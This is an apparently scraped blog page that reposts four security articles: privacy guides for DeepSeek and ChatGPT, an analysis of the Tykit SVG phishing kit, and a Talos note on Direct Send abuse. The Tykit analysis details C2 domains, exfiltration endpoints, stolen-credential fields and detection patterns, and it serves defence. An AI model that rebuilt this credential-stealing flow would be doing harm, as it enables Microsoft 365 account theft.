We’ve previously written about why neural networks are not the best choice for private conversations. Popular chatbots like ChatGPT, DeepSeek, and Gemini collect user data for training by default, so developers can see all our secrets: every chat you have with the chatbot is stored on company servers. This is precisely why it’s essential to understand what data each neural network collects, and how to set them up for maximum privacy.
In our previous post, we covered configuring ChatGPT’s privacy and security in abundant detail. Today, we examine the privacy settings in China’s answer to ChatGPT — DeepSeek. Curiously, unlike in ChatGPT, there aren’t that many at all.
What data DeepSeek collects
All data from your interactions with the chatbot, images and videos included
Details you provide in your account
IP address and approximate location
Information about your device: type, model, and operating system
The browser you’re using
Information about errors
What’s troubling is that the company doesn’t specify how long it keeps personal data, operating instead on the principle of “retain it as long as needed”. The privacy policy states that the data retention period varies depending on why the data is collected, yet no time limit is mentioned. Is this not another reason to avoid sharing sensitive information with these neural networks? After all, dataset leaks containing users’ personal data have become an everyday occurrence in the world of AI.
If you want to keep your IP address private while you work with DeepSeek, use a Kaspersky Security Cloud. Be wary of free VPN apps: threat actors frequently use them to create botnets (networks of compromised devices). Your smartphone or computer, and by extension, you yourself, could thus become unwitting accomplices in actual crimes.
Who gets your data
DeepSeek is a company under Chinese jurisdiction, so not only the developers but also Chinese law enforcement — as required by local laws — may have access to your chats. Researchers have also discovered that some of the data ends up on the servers of China Mobile — the country’s largest mobile carrier.
However, DeepSeek is hardly an outlier here: ChatGPT, Gemini, and other popular chatbots just as easily and casually share user data upon a request from law enforcement.
Disabling DeepSeek’s training on your data
The first thing to do — a now-standard step when setting up any chatbots — is to disable training on your data. Why could this pose a threat to your privacy? Sometimes, large language models (LLMs) can accidentally disclose real data from the training set to other users. This happens because neural networks don’t distinguish between confidential and non-confidential information. Whether it’s a name, an address, a password, a piece of code, or a photo of kittens — it makes little difference to the AI. Although DeepSeek’s developers claim to have taught the chatbot not to disclose personal data to other users, there’s no guarantee this will never happen. Furthermore, the risk of dataset leaks is always there.
The web-based version and the mobile app for DeepSeek have different settings, and the available options vary slightly. First of all, note that the web version only offers three interface languages: English, Chinese, and System. The System option is supposed to use the language set as the default in your browser or operating system. Unfortunately, this doesn’t always work reliably with all languages. Therefore, if you need the ability to switch DeepSeek’s interface to a different language, we recommend using the mobile app, which has no issues displaying the selected user interface language. It’s important to note that your choice of UI language doesn’t affect the language you use to communicate with DeepSeek. You can chat with the bot in any language it supports. The chatbot itself proudly claims to support more than 100 languages — from common to rare.
DeepSeek web version settings
To access the data management settings, open the left sidebar, click the three dots next to your name at the bottom, select Settings, and then navigate to the Data tab in the window that appears. We suggest you disable the option labeled Improve the model for everyone to reduce the likelihood that your chats with DeepSeek will end up in its training datasets. If you want the model to stop learning from the data you shared with it before turning off this option, you’ll need to email privacy@deepseek.com, and specify the exact data or chats.
Disabling DeepSeek training on your data in the web-based version
DeepSeek mobile app settings
In the DeepSeek mobile app, you also open the left sidebar, click the three dots next to your name at the bottom, and reveal the Settings menu. In the menu, open the Data controls section and turn off Improve the model for everyone.
Disabling DeepSeek training on your data in the app
Managing DeepSeek chats
All your chats with DeepSeek — both in the web version and in the mobile app — are collected in the left sidebar. You can rename any chat by giving it a descriptive title, share it with anyone by creating a public link, or delete a specific chat entirely.
Sharing DeepSeek chats
The ability to share a chat might seem extremely convenient, but remember that it poses risks to your privacy. Let’s say you used DeepSeek to plan a perfect vacation, and now you want to share the itinerary with your travel companions. You could certainly create a public link in DeepSeek and send it to your friends. However, anyone who gets hold of that link can read your plan and learn, among other things, that you’ll be away from home on specific dates. Are you sure this is what you want?
If you’re using the chatbot for confidential projects (which is not advisable in the first place, as it’s better to use a locally running version of DeepSeek for this kind of data, but more on this later), sharing the chat, even with a colleague, is definitely not a good idea. In the case of ChatGPT, similar shared chats were at one point indexed by search engines — allowing anyone to find and read them.
If you absolutely must send the content of a chat to someone else, it’s easier to copy it by clicking the designated button below the message in the chat window, and then to use a conventional method like email or a messaging app to send it, rather than share it with the entire world.
If, despite our warnings, you still wish to share your conversation via a public link, this is currently only possible in the web version of DeepSeek. To create a link to a chat, click the three dots next to the chat name in the left sidebar, select Share, and then, on the main chat board, check the boxes next to the messages you want to share, or check the Select all box at the bottom. After this, click Create public link.
Sharing DeepSeek chats in the web version
You can view all the chats you have shared and, if necessary, delete their public links in the web version, by going to Settings → Data → Shared links → Manage.
Managing shared DeepSeek chats in the web version
Deleting old DeepSeek chats
Why should you delete old DeepSeek chats? The fewer chats you have saved, the lower the risk that your confidential data could become accessible to unauthorized parties if your account is compromised, or if there’s a bug in the LLM itself. Unlike ChatGPT, DeepSeek doesn’t remember or use data from your past chats in new ones, so deleting them won’t impact your future use of the neural network.
However, you can resume a specific chat with DeepSeek at any time by selecting it in the sidebar. Therefore, before deleting a chat, consider whether you might need it again later.
To delete a specific chat: in the web version, click the three dots next to the chat in the left sidebar; in the mobile app, press and hold the chat name. In the window that appears, select Delete.
To delete your entire conversation history: in the web version, go to Settings → Data → Delete all chats → Delete all; in the application, go to Settings → Data controls → Delete all chats. Bear in mind that this only removes the chats from your account without deleting your data from DeepSeek’s servers.
If you want to save the results of your chats with DeepSeek, in the web version, first go to Settings → Data → Export data → Export. Wait for the archive to be prepared, and then download it. All data is exported in the JSON format. This feature is not available in the mobile app.
Managing your DeepSeek account
When you first access DeepSeek, you have two options: either sign up with your email and create a password, or log in with a Google account. From a security and privacy standpoint, the first option is better — especially if you create a strong, unique password for your account: you can use a tool like Kaspersky Password Manager to generate and safely store one.
You can subsequently log in with the same account in other browsers and on different devices. Your chat history will be accessible from any device linked to your account. So, if someone learns or steals your DeepSeek credentials, they’ll be able to review all your chats. Sadly, DeepSeek doesn’t yet support two-factor authentication or passkeys.
If you’ve even the slightest suspicion that your DeepSeek account credentials have been compromised, we recommend taking the following steps. Start by logging out of your account on all devices. In the web version, navigate to Settings → Profile → Log out of all devices → Log out. In the app, the path is Settings → Data controls → Log out of all devices. Next, you need to change your password, but DeepSeek doesn’t offer a direct path to do so once you’re logged in. To reset your password, go to the DeepSeek web version or mobile app, select the password login option, and click Forgot password?. DeepSeek will request your email address, send a verification code to that email, and allow you to reset the old password and create a new one.
Deploying DeepSeek locally
Privacy settings for the DeepSeek web version and mobile app are extremely limited and leave much to be desired. Fortunately, DeepSeek is an open-source language model. This means anyone can deploy the neural network locally on their computer. In this scenario, the AI won’t train on your data, and your information won’t end up on the company’s servers or with third parties. However, there’s a significant downside: when running the AI locally, you’ll be limited to the pre-trained model, and won’t be able to ask the chatbot to find up-to-date information online.
The simplest way to deploy DeepSeek locally is by using the LM Studio application. It allows you to work with models offline, and doesn’t collect any information from your chats with the AI. Download the application, click the search icon, and look for the model you need. The application will likely offer many different versions of the same model.
Searching LM Studio for DeepSeek models
These versions differ in the number of parameters, denoted by the letter B. The more parameters a model has, the more mathematical computations it can perform, and the better it performs; consequently, the more resources it requires to run smoothly. For comparison, a modern laptop with 16–32GB of RAM is sufficient for lighter models (7B–13B), but for the largest version, with 70 billion parameters, you’d need to own an entire data center.
LM Studio will alert you if the model is too heavy for your device.
LM Studio warning you that the model may be too large for your device
It’s important to understand that local AI use is not a panacea in terms of privacy and security. It doesn’t hurt to periodically check that LM Studio (or another similar application) is not connecting to external servers. For example, you can use the netstat command for that. If you’re not familiar with netstat, simply ask the chatbot to tell you about today’s news. If the chatbot is running locally as designed, the response definitely won’t include any current events.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-21 18:06:492025-10-21 18:06:49How to use DeepSeek both privately and securely | Kaspersky official blog
Not long ago we reported a spike in phishing attacks that use an SVG file as the delivery vector. One striking detail was how the SVG embeds JavaScript that rebuilds the payload with XOR and then executes it directly via eval() to redirect victims to a phishing page.
A quick look at the indicators we found showed that nearly all related cases used the same exfiltration addresses. Even more telling: the client-side logic and obfuscation techniques were unchanged across samples, and the communication with the C2 servers was implemented in several steps, with validation of the victim’s current authorization state at each stage.
All this suggests the threat has a certain level of maturity; it’s not just an unusual delivery method, but something that behaves like a phishing kit.
To test that hypothesis, measure the scale of the problem, and be able to tell this threat apart from others, we performed a technical analysis of the samples and labeled the family Tykit (Typical phishing kit). Here’s what we found.
Key Takeaways
The first samples appeared in the ANY.RUN’s Interactive Sandbox in May 2025, with peak activity observed in September–October 2025.
It mimics Microsoft 365 login pages, targeting corporate account credentials of numerous organizations.
The threat utilizes various evasion tactics like hiding code in SVGs or layering redirects.
The client-side code executes in several stages and uses basic anti-detection techniques.
The most affected industries include construction, professional services, IT, finance, government, telecom, real estate, education, and others across US, Canada, LATAM, EMEA, SE Asia and Middle East.
Discovery & Pivoting: How ANY.RUN Detected the Threat
Beginning with the analysis session in the ANY.RUN Sandbox, we quickly found the artifacts needed to expand the context:
The same SVG image was used for redirection (SHA256: a7184bef39523bef32683ef7af440a5b2235e83e7fb83c6b7ee5f08286731892
Fig. 1 Redirecting SVG image
The fake Microsoft 365 login page was hosted on the domain loginmicr0sft0nlineeckaf[.]52632651246148569845521065[.]cc; the URL contained the parameter /?s=, which could be useful for further searching.
A POST request was sent to the server segy2[.]cc, targeting the URL /api/validate and containing data in the request body.
Detect threats faster with ANY.RUN’s Interactive Sandbox See full attack chain in seconds for immediate response
The result was encouraging: 189 related analysis sessions, most of them with a Malicious verdict. The earliest analysis containing the searched indicators dates back to May 7, 2025:
Bingo! The same activity was observed several months earlier; phishing campaigns featuring URLs with the parameter /?s=, and requests sent to the server segy[.]cc, whose domain name is almost identical to the original one.
A search using domainName:”^segy.” revealed a few more related domains:
Fig. 4: Additional segy domains*
With several hundred submissions recorded between May and October 2025, all sharing nearly identical patterns, this could hardly be a coincidence. The template-based infrastructure, identical attack scenarios, and a set of URLs resembling C2 API endpoints; could this be a phishing kit?
It was necessary to analyze the JavaScript code from the phishing pages to see whether there were any recurring elements across samples, how sophisticated the code was, how many execution stages it included, and whether it implemented any mechanisms to prevent analysis.
Catch attacks early with instant IOC enrichment in TI Lookup Power your proactive defense with data from 15K SOCs
Let’s look at another analysis session that reproduces the credentials-entry stage; a critical phase, because most phishing kits reveal themselves fully at the point of exfiltration:
Step 1: SVG as the delivery vector
The attack vector remains an SVG image that redirects the browser. The image uses the same design, but this time includes a working check-stub that prompts the user to “Enter the last 4 digits of your phone number” (in reality any value is accepted).
Fig. 6: SVG file with the “check”
Step 2: Trampoline and CAPTCHA stage
After the check is submitted, the page redirects to a trampoline script, which then forwards the browser to the main phishing page.
The value of the s= parameter is the victim’s email encoded in Base64.
Fig. 7: Trampoline code that forwards to the main phishing page
Next, a page with a CAPTCHA loads; the site uses the Cloudflare Turnstile widget as anti-bot protection.
Fig. 8: Anti-bot protection on the phishing page using Cloudflare Turnstile
It’s worth noting that the client-side code includes basic anti-debugging measures, for example, it blocks key combinations that open DevTools and disables the context menu.
Fig. 9: Basic anti-debug protections in the page source
Step 3: Credential capture and C2 logic
After the CAPTCHA is passed, the page reloads and renders a fake Microsoft 365 sign-in page.
At the same time, a background POST request is sent to the C2 server at ‘/api/validate’. The request body contains JSON with the following fields:
“key”: a session key, or possibly a “license” key for the phishing kit.
“redirect”: the URL to which the victim should be redirected.
“email”: the victim’s email address, decoded; present if the s= parameter was populated earlier.
The logic for sending the request, validating the response, and retrieving the next stage of the payload is implemented in an obfuscated portion of the page; after deobfuscation, it looks like this:
Fig. 10: Logic for sending and validating the victim’s email
The C2 server responds with a JSON object that contains:
“status”: the C2 verdict — “success” or “error”.
“message”: the next stage, provided as HTML.
“data”: {“email”}: the victim’s email address.
The next stage presents the password-entry form. The returned HTML also embeds obfuscated JavaScript that implements the logic for exfiltrating the stolen credentials to the C2 endpoint ‘/api/login’ and for deciding the page’s next actions (for example: show a prompt “Incorrect password”, redirect the user to a legitimate site to hide the fraud, etc.).
A couple of notable snippets illustrate this behavior:
Fig. 11: Exfiltration of the victim’s login and password
The JSON sent in the POST /api/login request contains the following fields:
“key”: The key (see above for possible meaning).
“redierct”: The redirect URL (note the misspelling in the field name).
“token”: An authorization JWT. Notably, the sample token eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJiZjk5M2NkZS1mOTdiLTQyYTctODcxYy1lOTk1MDgzMmM5NjgiLCJleHAiOjE2OTkxNzc0NjF9.p9-OI0LCYcOjaU1I3TMZTjNSos50txbV3_Mi1jk1u8c decodes to an expired token; the exp claim is 1699177461, which corresponds to Sunday, November 5, 2023, 09:44:21 GMT.
“server”: The C2 server domain name.
“email”: The victim’s email address.
“password”: The victim’s password.
These fields are then used by the server response to control what the victim sees next and whether additional actions (debugging hooks, logging, further redirects) are triggered.
The response to the POST /api/login request is a JSON object with the following fields:
“status”: “success” | “info” | “error”
“d”: “<HTML payload to be shown to the user>”
“message”: “Text such as ‘Incorrect password’ when the user enters the wrong password”
“data”: { “email”: “<victim email>” }
Behavior depends on the value of status:
“success”: Render the HTML payload found in “d” to the user.
“info”: Send a (likely debugging) POST request to /x.php on the C2 server. The logic for this flow is shown in the figure below.
“error”: Display an error message (for example, “Incorrect password”).
Fig. 12: Decision logic after the /api/login request
At this point the execution chain of the phishing page ends. In sum, the page implements a fairly involved execution mechanism: the payload is obfuscated, there are basic (nonetheless effective) anti-debugging measures, and the exfiltration logic runs through several staged steps.
Detection Rules for Identifying Tykit Activity
After analyzing the structure of the Tykit phishing payload and the requests sent during the attack, we developed a set of rules that allow detecting the threat at different stages of its implementation.
SVG files
Let’s start with the SVG images themselves. While embedding JavaScript in SVGs can enable legitimate functionality (for example, interactive survey forms, animations, or dynamic UI mockups), it’s frequently abused by threat actors to hide malicious payloads.
One common way to distinguish benign code from malicious is the presence of obfuscation; techniques that hinder triage and signature-based analysis by security tools and SOC analysts.
To improve detection rates for this vector (even without attributing samples to a specific actor), monitor for:
General signs of code obfuscation, e.g. frequent calls to atob(), parseInt(), charCodeAt(), fromCodePoint(), and generated variable names like var _0xABCDEF01 = … often produced by tools such as Obfuscator.io.
Use of the unsafe eval() call, which executes arbitrary code.
Script logic that redirects or alters the current document; calls to window.location.* or manipulation of hrefattributes.
Below is a code snippet taken from an SVG used to load Tykit’s phishing page:
Fig. 13: Malicious redirect code from an SVG that loads the Tykit phishing page
Domains
In nearly all cases linked to Tykit, the operators used templated domain names. For exfiltration servers we observed domains matching the ^segy?.* pattern, for example:
segy[.]zip
segy[.]xyz
segy[.]cc
segy[.]shop
segy2[.]cc
For the main servers hosting the phishing pages, aside from abuse of cloud and object-storage services, the operators frequently registered domains that appear to be generated by a DGA (domain-generation algorithm). These domains match a pattern like: ^loginmicr(o|0)s.*?.([a-z]+)?d+.cc$
To collect all IOCs and perform a detailed case analysis, see the TI Lookup query:
Finally, the main distinction between Tykit and many other phishing campaigns is the set of HTTP requests sent to the C2 that determine the next actions and handle exfiltration of victim data.
After analyzing the JavaScript used across samples, we identified the following requests:
GET /?s=<b64-encoded victim email>
A series of initial requests used to pass Cloudflare Turnstile and load the phishing page; the s parameter may be empty.
POST /api/validate
The first C2 request, used to validate the supplied email. The request body contains JSON with fields (see earlier):
“key”
“redirect”
“email”
The server responds with JSON containing:
“status”
“message” (next stage, as HTML)
“data”: {“email”}
POST /api/validate (variant)
A second variant of the validation request whose JSON body includes:
“key”
“redirect”
“token”
“server”
“email”
The response has the same structure as above.
POST /api/login
The data-exfiltration request. The JSON body contains:
“key”
“redierct” (sic — note the misspelling)
“token”
“server”
“email”
“password”
The response JSON instructs how to change the state of the phishing page and includes:
“status”
“d” (HTML payload to render)
“message”
“data”: {“email”}
POST /x.php
Likely a debugging/logging endpoint triggered when the previous /api/login response contains “status”: “info”. The JSON body includes:
“id”
“key”
“config”
The format of the server’s response to this request was not determined during the investigation.
Who’s Being Targeted
We collected several signals about the industries and countries targeted by Tykit.
Most affected countries:
United States
Canada
South-East Asia
LATAM / South America
EU countries
Middle East
Targeted industries:
Construction
Professional services
IT
Agriculture
Commerce / Retail
Real estate
Education
Design
Finance
Government & military
Telecom
There are no unusual TTPs to call out; this is another wave of spearphishing aimed at stealing Microsoft 365 credentials, featuring a multi-stage execution chain and the capability for AitM interception.
Taken together, given the wide geographic and industry spread and the TTPs that match standard phishing kit behavior, the threat has been active for quite some time. It appears to be a typical PhaaS-style framework (hence the name TYpical phishKIT, or Tykit). Time will tell how it evolves.
How Tykit Affects Organizations
Tykit is a credential-theft campaign that targets Microsoft 365 accounts via a multi-stage phishing flow. Successful compromises can lead to:
Data exfiltration from mailboxes, drives, and connected SaaS apps.
Lateral movement inside environments where cloud identities map to internal resources.
AitM interception of MFA or session tokens, increasing the chance of bypassing second-factor protections.
Operational and reputational damage (incident response costs, regulatory exposure, loss of client trust).
Sectors at higher risk reflect the campaign’s targeting: construction, professional services, IT, finance, government, telecom, real estate, education, and others across US, Canada, LATAM, EMEA, SE Asia and Middle East.
How to Prevent Tykit Attacks
Tykit doesn’t reinvent phishing, but it shows how small technical tweaks, like hiding code in SVGs or layering redirects, can make attacks harder to catch. Still, with better visibility and the right tools, teams can stop it before credentials are stolen.
Strengthen email and file security
SVG files may look safe but can hide JavaScript that executes in the browser. Ensure your security gateway actually inspects SVG content, not just extensions. Use sandbox detonation and Content Disarm & Reconstruction (CDR) to uncover hidden payloads. The ANY.RUN Sandbox is particularly effective for detonating such files and exposing their redirects, scripts, and network calls in seconds.
Use phishing-resistant MFA
Tykit highlights how traditional MFA can be bypassed. Switch to phishing-resistant methods like FIDO2 or certificate-based MFA, disable legacy protocols, and enforce Conditional Access in Microsoft 365. Reviewing OAuth app consents and token lifetimes regularly helps minimize exposure.
Monitor for key indicators
Watch for outbound requests to domains such as segy* or loginmicr(o|0)s.*.cc, and POST requests to /api/validate, /api/login, or /x.php. ANY.RUN’s Threat Intelligence Lookup can quickly connect these IOCs to other related phishing activity, giving analysts context in minutes.
Automate detection and threat hunting
Configure your SIEM or XDR to alert on suspicious Base64 query parameters (like /?s=) or requests following Tykit’s structure. Integrating ANY.RUN’s Threat Intelligence Feeds ensures new indicators, fresh domains, hashes, and URL patterns, are automatically available for detection.
Educate and respond fast
Regular awareness training helps users recognize that even “image” files can trigger phishing chains. If an incident occurs, isolate affected accounts, revoke sessions, and reset credentials.
Using ANY.RUN’s Interactive Sandbox during incident response can accelerate this process: analysts can safely replay the infection chain, confirm what data was exfiltrated, and extract accurate IOCs within minutes. This shortens MTTR and helps strengthen detections for the next wave of similar campaigns.
Conclusion: Lessons from a “Typical” Phishing Kit
We reviewed another sobering example of how phishing remains front and center in the cyber-threat landscape, and how regularly new tools appear to carry out these attacks; each one differing from its predecessors in some way.
We labeled this example Tykit, examined its technical details, and derived several detection and hunting rules that, taken together, will help detect new samples and monitor the campaign’s evolution.
Tykit doesn’t include a full arsenal of evasion and anti-detection techniques, but, like its more mature counterparts, it implements AitM-style data interception and methods to bypass multi-factor protections. It also relies on a quasi-distributed network architecture: servers are assigned dynamic domain names and roles are separated between “delivery” and “exfiltration.”
Empowering Faster Analysis with ANY.RUN
Investigating campaigns like Tykit can be time-consuming, from detecting a single suspicious SVG to uncovering the entire phishing infrastructure behind it. ANY.RUN helps analysts turn hours of manual work into minutes of interactive analysis.
Here’s how:
See the full attack chain in under 60 seconds. Detonate SVGs, phishing pages, or any other file type in real time and instantly observe redirects, scripts, and payload execution.
Reduce investigation time. With live network mapping, script deobfuscation, and dynamic IOCs, analysts can skip static triage and focus directly on what matters.
Cut MTTR by more than 20 minutes per case. Quick visibility into C2 communications, credential-capture logic, and data exfiltration flows allows teams to respond faster and with higher confidence.
Boost proactive defense. Using ANY.RUN Threat Intelligence Lookup, SOC teams can pivot from a single domain or hash to hundreds of related submissions, revealing shared infrastructure and campaign patterns to enrich detection rules for catching future attacks.
Strengthen detections with fresh intelligence. Automatically enrich your security tools with new indicators with TI Feeds sourced from live sandbox analyses and community contributions.
For SOC teams, MSSPs, and threat researchers, ANY.RUN provides the speed, depth, and context needed to stay ahead of campaigns like Tykit, and the next one that follows.
Over 500,000 cybersecurity professionals and 15,000+ companies in finance, manufacturing, healthcare, and other sectors rely on ANY.RUN to streamline malware investigations worldwide.
Speed up triage and response by detonating suspicious files in ANY.RUN’s Interactive Sandbox, observing malicious behavior in real time, and gathering insights for faster, more confident security decisions. Paired with Threat Intelligence Lookup and Threat Intelligence Feeds, it provides actionable data on cyberattacks to improve detection and deepen your understanding of evolving threats.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-21 11:06:402025-10-21 11:06:40Tykit Analysis: New Phishing Kit Stealing Hundreds of Microsoft Accounts in Finance
Microsoft 365 Exchange Online’s Direct Send is designed to solve an enterprise-scale operational challenge: certain devices and legacy applications such as multifunction printers, scanners, building systems, and older line‑of‑business apps, need to send email into the tenant but lack the ability to properly authenticate. Direct Send preserves business workflows by allowing messages from these appliances to bypass more rigorous authentication and security checks.
Unfortunately, Direct Send’s ability for content to bypass standard security checks makes it an attractive target for exploitation. Cisco Talos has observed increased activity by malicious actors leveraging Direct Send as part of phishing campaigns and business email compromise (BEC) attacks. Public research from the broader community, including reporting by Varonis, Abnormal Security, Ironscales, Proofpoint, Barracuda, Mimecast, Arctic Wolf, and others, agree with Cisco Talos findings: Adversaries have actively targeted corporations using Direct Send in recent months.
Microsoft Inc., for its part, has already introduced a Public Preview of the RejectDirectSend control and signaled future improvements, such as Direct Send-specific usage reports and an eventual “default‑off” posture for new tenants. These ongoing enhancements, layered with existing security controls, are helping organizations strengthen their defenses while still supporting the business-critical workflows that Direct Send was designed to enable.
How Direct Send is exploited
Direct Send abuse is the opportunistic exploitation of a trusted pathway. Adversaries emulate device or application traffic and send unauthenticated messages that appear to originate from internal accounts and trusted systems. The research cited above describes recurring techniques, such as:
Impersonating internal users, executives, or IT help desks (e.g., observed by Abnormal and Varonis)
Business-themed lures, such as task approvals, voicemail or service notifications, and wire or payment prompts (e.g., Proofpoint’s observations about social engineering payloads)
QR codes embedded in PDFs and low-content or empty-body messages carrying obfuscated attachments used to bypass traditional content filters and drive the user to credential harvesting pages (e.g., highlighted in Ironscales, Barracuda, and Mimecast reporting)
Use of trusted Exchange infrastructure and legitimate SMTP flows to inherit implicit trust and decrease payload scrutiny
“What happens when a feature built for convenience becomes an attacker’s perfect disguise?” – Abnormal Security, framing the dual‑use nature of Direct Send.
Legitimate dependencies still exist. Many enterprises have not fully migrated older scanning or workflow systems to authenticated submission (SMTP AUTH) or to partner connectors. A hasty blanket disablement without visibility and change planning can disrupt invoice processing, document distribution, or facilities notifications. That’s precisely why Microsoft is building reporting to help administrators sequence risk reduction without accidental business impact.
Examples
Figure 1. Spoofed American Express dispute (left), fake ACH payment notice (right).
The examples in Figure 1 (victim information redacted) demonstrate very obvious attacks that were presumed to be internal messages and therefore bypassed sender verification that could have convicted these threats.
Direct Send bypasses sender verification
There are three key elements to email domain sender verification:
DomainKeys-Identified Mail (DKIM) is a cryptographic signature of message headers and content. This can verify that the message was sent by a server with a key authorized by the owner of the sending domain.
Sender Policy Framework (SPF) specifies a list of IP ranges that are authorized to send on behalf of the domain.
Domain-based Message Authentication, Reporting and Conformance (DMARC) defines what to do with a domain’s noncompliant mail when it lacks a DKIM signature and SPF authorization. Senders can choose a DMARC policy that instructs recipients to reject this mail. This is increasingly common, especially with banks.
Had the previous examples in Figure 1 been scanned with DMARC, DKIM, and SPF, they would have been rejected. However, Direct Send prevents this sort of inspection.
Mitigation and recommendations
With Direct Send abuse becoming more prevalent, it is critical for organizations to review their security posture related to Direct Send. Aligning with Microsoft’s guidance and community findings, Talos recommends:
Disable or restrict Direct Send where feasible.
Inventory current reliance. Although forthcoming Microsoft reporting should make this more streamlined, creating or reviewing internal device inventories, SPF records, and connector configs.
Enable Set-OrganizationConfig -RejectDirectSend $true once you’ve validated mailflows for legitimate internal traffic.
Migrate devices to authenticated SMTP.
Prefer authenticated SMTP client submission (port 587) for devices and applications that can store modern credentials or leverage app-specific identities (Microsoft documentation).
Use SMTP relays with tightly scoped source IP restrictions only for devices that are unable to use authenticated submission.
Implement partner/inbound connectors for approved senders.
Establish certificate or IP-based partner connectors for third-party services legitimately sending with your accepted domains.
Strengthen authentication and alignment.
Maintain SPF with required authorized sending IPs; adopt Soft Fail (~all) per guidance from the Messaging, Malware and Mobile Anti-Abuse Working Group (M³AAWG) as well as Microsoft.
Enforce DKIM signing and monitor DMARC aggregate reports for anomalous internal-looking unauthenticated traffic.
Strengthen policy, access, and monitoring.
Restrict egress on port 25 from general user segments; only designated hosts should originate SMTP traffic.
Use Conditional Access or equivalent policies to block legacy authentication paths that are no longer justified.
Alert on unexpected internal domain messages lacking authentication.
“You can’t block what you don’t see.” – Ironscales, on visibility as a prerequisite to confident enforcement
These defenses layer on Microsoft’s platform controls, reducing attacker dwell time and shortening the detection-to-remediation window.
How Talos protects against Direct Send abuse
Talos leverages advanced AI and machine learning to continuously analyze global email telemetry, campaign infrastructure, and evolving social engineering tactics — ensuring our customers stay ahead of emerging threats. Our security platform goes far beyond basic header checks, using behavioral analytics, deep content inspection, and continually adapting models to identify and neutralize sophisticated malicious actors before they target your organization.
Contact Cisco Talos Incident Response to learn more about everything from proactively securing critical communications and endpoint protection, to security auditing and incident management.
Acknowledgments: We appreciate the sustained efforts of Microsoft’s engineering and security teams and the broader research community whose transparent publications inform defenders worldwide.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-10-21 10:06:432025-10-21 10:06:43Reducing abuse of Microsoft 365 Exchange Online’s Direct Send
When we interact with artificial intelligence, we often share a significant amount of personal information without giving it much thought. This information can range from dietary preferences and marital status to our home address and even social security number. To ensure the security and privacy of this highly sensitive information, it’s essential to understand exactly what the AI does with your data: where it stores it and whether it uses it for training.
In this post, we take a closer look at the data collection policy of one of the most popular AI apps, ChatGPT, and explain how to configure it to maximize your privacy and security to the extent that OpenAI allows it. This is a long guide — but a comprehensive one.
OpenAI, the owner and developer of ChatGPT, maintains two privacy policies. The specific policy that applies to users depends on the region where that individual registered their account:
Because these policies are similar, we’ll first cover the common elements, and then discuss the differences.
By default, OpenAI collects an extensive array of personal information and technical data about devices from all ChatGPT users.
Account information: name, login credentials, date of birth, billing information, and transaction history
User content: prompts as well as uploaded files, images, and audio
Communication information: contact details the user provided when reaching out to OpenAI via email or social media
Log data: IP address, browser type and settings, request date and time, and details about how the user interacts with OpenAI services
Usage data: information about the user’s interaction with OpenAI services, such as content viewed, features used, actions taken, and technical details like country, time zone, device, and connection type
Device information: device name, operating system, device identifiers, and the browser used
Location information: the region determined by the IP address, rather than the exact location
Cookies and similar technologies: necessary for service operation, user authentication, enabling specific features, and ensuring security; the complete list of cookies and their respective retention periods is available here
What exactly OpenAI does with the data it collects from individual users will be discussed in the next part of this post. Here, we indicate the key difference between the privacy policies for users from the European Economic Area (EEA) and those from other regions. European users have the right to object to the use of their personal data for direct marketing. They may also challenge data processing where the company justifies this by its “legitimate interests”, such as internal administration or improvements to services.
Note that OpenAI’s handling of data for business accounts is governed by separate rules that apply to ChatGPT Business and ChatGPT Enterprise subscriptions, as well as API access.
What OpenAI does with your data, and whether ChatGPT is trained on your chats
By default, ChatGPT can train its models on user prompts and the content that users upload. This policy applies to users of both the free version and the Plus and Pro subscriptions.
For business accounts — specifically ChatGPT Enterprise, ChatGPT Business, and API access — training on user data is disabled by default. However, in the case of the API (the application programming interface that connects OpenAI models to other applications and services — the simplest use case being ChatGPT-based customer support bots), the company provides developers with the option to voluntarily enable data transmission.
OpenAI outlines a comprehensive list of primary purposes for processing users’ personal information:
To maintain services: to respond to queries and assist users
To improve and develop services: to add new features and conduct research
To communicate with users: to notify users about changes and events
To protect the security of services: to prevent fraud and ensure security
To comply with legal obligations: to protect the rights of users, OpenAI, and third parties
The company also states that it may anonymize users’ personal data, though it does not obligate itself to do so. Furthermore, OpenAI reserves the right to transfer user data to third parties — specifically its contractors, partners, or government agencies — if such transfer is necessary for service operation, compliance with the law, or the protection of rights and security.
As the company notes on its website: “In some cases, models may learn from personal information to understand how elements like names and addresses function in language, or to recognize public figures and well-known entities”.
It’s important to note that all user data is processed and stored on OpenAI servers in the United States. Although the level of personal information protection may vary from country to country, the company asserts that it applies uniform security measures to all users.
How to prevent ChatGPT from using your data for AI training
To disable the collection of your data within the app, click your account name in the lower left corner of the screen. Select Settings, then navigate to Data controls.
In the Data controls section of the ChatGPT settings, you can disable the use of your prompts for model training
In Data controls, turn off the toggles next to the following items:
Improve the model for everyone: disabling this option prevents the use of your prompts and uploads (text, files, images) for model training. Turning this off deactivates the two items below it
Include your audio recordings: disabling this option prevents the voice messages from the dictation feature from being used for model training. It’s disabled by default
Include your video recordings: this refers to the feature that allows you to include a video stream from your camera during a voice chat in the ChatGPT apps for iOS and Android. This video stream may also be used for model training. You can also disable this option through the web application. It’s disabled by default
By turning off these settings, you prevent the use of new data for model training. However, it’s important to realize: if your prompts or content were already used for training before you disabled the option, it’s impossible to remove them from the trained model.
In this same section, you can delete or archive all chats, and also request to Export Data from your account. This allows you to check what information OpenAI stores about you. A data archive will be sent to your email. Please note that preparing an export may take some time.
The Delete account option is also available here. When your account is deleted, only your personal data is erased; information already used for model training remains.
Beyond the in-app settings, you can manage your data through the OpenAI Privacy Portal. On the portal, you can:
Request and download all your data stored by OpenAI
Completely delete your custom GPTs, as well as your ChatGPT account and the personal data associated with it
Ask OpenAI not to train the AI on your data. If OpenAI approves your request, the AI will stop training on the data you provided before you disabled the Improve the model for everyone option in the settings
Sometimes ChatGPT may also train on personal data from public sources — you can submit a request to stop this as well
Request the deletion of personal data from specific conversations or prompts
